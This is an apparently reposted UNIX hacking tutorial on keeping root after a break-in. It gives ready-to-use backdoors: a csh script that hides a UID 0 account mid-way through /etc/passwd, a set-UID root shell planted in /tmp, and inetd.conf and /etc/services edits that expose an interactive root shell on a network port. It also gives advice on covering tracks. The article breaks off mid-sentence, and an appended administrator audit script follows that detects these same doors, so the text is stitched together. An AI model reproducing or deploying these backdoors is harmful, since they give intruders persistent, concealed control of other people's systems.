Published by: mobilecrackers on Jul 14, 2012
Ok..... You've been at it all night, trying all the exploits you can think of. The system seems tight. The system looks tight. The system *is* tight. You've tried everything: default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally! After seemingly endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user privilege you have worked so hard to achieve....?

This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike. From a hacking perspective, it is obvious what good this paper will do you. Admins can likewise benefit from this paper. Ever wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your system?

This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are ways into one.

Beforehand

Know the location of critical system files. This should be obvious (if you can't list any off the top of your head, stop reading now, get a book on UNIX, read it, then come back to me...). Be familiar with passwd file formats (including the general 7-field format, system-specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful when you need to quickly search and edit a large file. If you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...

The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time to come. One major thing to be aware of is the fact that if you can cover your tracks during the initial break-in, no one will be looking for back doors.

The Overt

[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of re-entry. It flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...

#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# daemon9@netcom.com

set linecount = `wc -l /etc/passwd`
cd                                  # Do this at home.
cp /etc/passwd ./temppass           # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1                 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass     # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd               # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...

NEVER, EVER, change the root password. The reasons are obvious.

[2] In a similar vein, enable a disabled account as UID 0, such as sync. Or, perhaps, an account somewhere buried deep in the passwd file has been abandoned and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second field).

[3] Leave an SUID root shell in /tmp.

#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.evilnaughtyshell  # Don't name it that...
chmod 4755 /tmp/.evilnaughtyshell

Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may notice... (but, hey, this *is* the overt section...). I will not detail the changes necessary because they can be quite system specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.

The Veiled

[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some background info: the Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical lines look like this:

(1)  (2)    (3) (4)    (5)  (6)             (7)
ftp  stream tcp nowait root /usr/etc/ftpd   ftpd
talk dgram  udp wait   root /usr/etc/ntalkd ntalkd

Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect. TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field, which is either of the two transport protocols, TCP or UDP. Field (4) specifies whether the daemon is iterative or concurrent. A 'wait' flag indicates that the server will process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or, more importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally. This is done with an 'internal' flag in fields (6) and (7).

So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it with something else: a program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd file, etc...

For the insinuation-impaired, try this: open /etc/inetd.conf in an available editor. Find the line that reads:

daytime stream tcp nowait root internal

and change it to:

daytime stream tcp nowait /bin/sh sh -i

You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and restart the process (kill -9 the inetd process, then run /usr/sbin/inetd or /usr/etc/inetd), which will interrupt ALL network connections (so it is a good idea to do this off peak hours).

[5] An alternative to compromising a well known service would be to install a new one that runs a program of your choice. One simple solution is to set up a shell that runs similarly to the above backdoor. You need to make sure the entry appears in /etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:

(1)  (2)/(3) (4)
smtp 25/tcp  mail

Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name associated with the service. For instance, add this line to /etc/services:

evil 22/tcp evil

and this line to /etc/inetd.conf:

evil stream tcp nowait /bin/sh sh -i

Restart inetd as before.

Note: Potentially, these are VERY powerful backdoors. They not only offer local re-entry from any account on the system,
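From the administrator's side, an added example (not code from the original article) with checks for the doors described in [1] through [5]: extra UID 0 accounts wherever they sit in the passwd file, set-UID files under /tmp, inetd.conf entries that hand a connection to a shell, and /etc/services ports claimed twice. The function names and the sample files are my own assumptions; the samples are constructed in a scratch directory, and the defaults point the functions at the real /etc/passwd, /tmp, /etc/inetd.conf and /etc/services.

```shell
# Added audit example, not code from the original article: administrator-side
# checks for the doors in [1]-[5]. Function names and sample data are assumptions.

# [1],[2]: accounts with UID 0 other than root. awk reads every record, so a
# line buried mid-file or a re-enabled "sync" is reported like any other.
find_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# [3]: set-UID executables under a directory (default /tmp), dot-files included.
find_suid_files() {
    find "${1:-/tmp}" -type f -perm -4000 2>/dev/null | sort
}

# [4],[5]: inetd.conf entries whose user field (5) is a path rather than an
# account name, or whose server or first argument (6, 7) is a shell.
find_shell_services() {
    awk '$1 ~ /^#/ || NF < 6 { next }
         $5 ~ /\// || $6 ~ /\/(sh|csh|ksh|bash)$/ || $7 ~ /^(sh|csh|ksh|bash)$/ { print $1 }' \
        "${1:-/etc/inetd.conf}"
}

# [5]: port/protocol pairs claimed by more than one name in /etc/services,
# e.g. "evil 22/tcp" added next to the service already on port 22.
find_duplicate_ports() {
    awk '$1 ~ /^#/ { next } NF >= 2 { n[$2]++ } END { for (p in n) if (n[p] > 1) print p }' \
        "${1:-/etc/services}" | sort
}

# Constructed sample files in a scratch directory (never the real system files).
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh
bin:x:2:2:bin:/bin:/bin/false
sync::0:0:sync:/bin:/bin/sync
EOF
cat > "$SAMPLE_DIR/inetd.conf" <<'EOF'
ftp     stream tcp nowait root /usr/etc/ftpd ftpd
talk    dgram  udp wait   root /usr/etc/ntalkd ntalkd
daytime stream tcp nowait /bin/sh sh -i
evil    stream tcp nowait root /bin/sh sh -i
EOF
printf 'smtp 25/tcp mail\nssh 22/tcp\nevil 22/tcp evil\n' > "$SAMPLE_DIR/services"
mkdir "$SAMPLE_DIR/tmp" && : > "$SAMPLE_DIR/tmp/.evilnaughtyshell" && chmod 4755 "$SAMPLE_DIR/tmp/.evilnaughtyshell"

find_uid0_accounts "$SAMPLE_DIR/passwd"; find_suid_files "$SAMPLE_DIR/tmp"
find_shell_services "$SAMPLE_DIR/inetd.conf"; find_duplicate_ports "$SAMPLE_DIR/services"
```

The inetd check reports the altered daytime line because its user field is a path, and the evil line because its server is a shell; a legitimate "internal" service has no shell in fields (6) or (7) and passes.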